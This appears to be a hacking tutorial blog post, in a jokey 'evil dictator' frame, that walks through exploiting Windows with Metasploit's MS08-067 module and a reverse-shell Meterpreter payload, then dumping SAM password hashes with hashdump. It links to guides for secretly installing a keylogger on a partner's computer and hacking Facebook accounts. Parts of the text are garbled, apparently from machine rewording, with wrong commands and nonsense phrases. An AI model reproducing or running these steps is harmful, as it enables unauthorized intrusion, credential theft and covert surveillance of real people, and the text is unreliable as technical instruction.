How to Remotely Grab Encrypted Passwords from any Computer

There is a vicious evil dictator who destroys the earth, and in one of our last, he successfully used his computer and saved the world from nuclear destruction. After that, we covered our tracks so that no one would know what we were doing, and we even built a computer hack to hack his computer from time to time so that we could track what he was doing next.

With this new hack, we'll hold passwords on the dictator's computer so we can access his PC via his account - or anyone else's account on his computer, including the most important account - that of the system administrator.

Don't Miss: How to Remotely install a Keylogger on your Girlfriends computer

Windows applications store passwords encrypted within a file called a SAM file. This file resides in the c:\windows\system32\config\sam directory. If we have access to his computer, as we have already done, we may obtain a copy of encrypted passwords, transfer them to our computer, and give them to him at a later time.

So, let's burn our trusted hack tool, Metasploit, and go get those passwords!

Step 1 : Hack the System

Again, let's use tested and true exploitation; type:

  • msf> use exploit/windows/smb/ms08_067_netapi

Now, let's Set a payload on all our powerful Meterpreter.

  • msf (ms08_067_netapi)> set payload /windows/meterpreter/reverse_tcp

It is always a good idea now to check out our options.

As you can see, we will need LHOST (our computer's IP address) and RHOST (victim's IP address). Let's arrange these now.

  • msf (ms08_067_netapi)> set RHOST
  • msf (ms08_067_netapi)> set LHOST

With everything set, now all that's left to do is exploit!

  • msf (ms08_067_netapi)> use

We now have the ultimate Meterpreter promotion on the computer of a maniacal dictator!

Step 2 : Grab the password file

As you can see from my previous tutorials, Meterpreter has several powerful scripts built-in. For this, we will be using one called hashdump.

Just a little explanation before we grab those passwords ...

Don't Miss: How to Hack any Facebook Account using Wireshark 2020 New Method

For security purposes, most operating systems (including all modern Windows applications) store user passwords in hashes. This is a one-way encryption that makes passwords unreadable to people. These are the hashes we follow, which is why the script is called hashdump.

So, let’s keep taking those hashes!

  • meterpreter> hashdump

As you can see, we now have several users with their encrypted password hashes. Well, at the moment we can't read them, but go back to my next lesson and I'll show you how to break them down so we can use them in our free time.

Remember, once we have a corrupt dictator’s password, he or she may use that password for other programs (i.e. email, secure locations, etc.), which gives us access to many of his or her secure assets.

Post a comment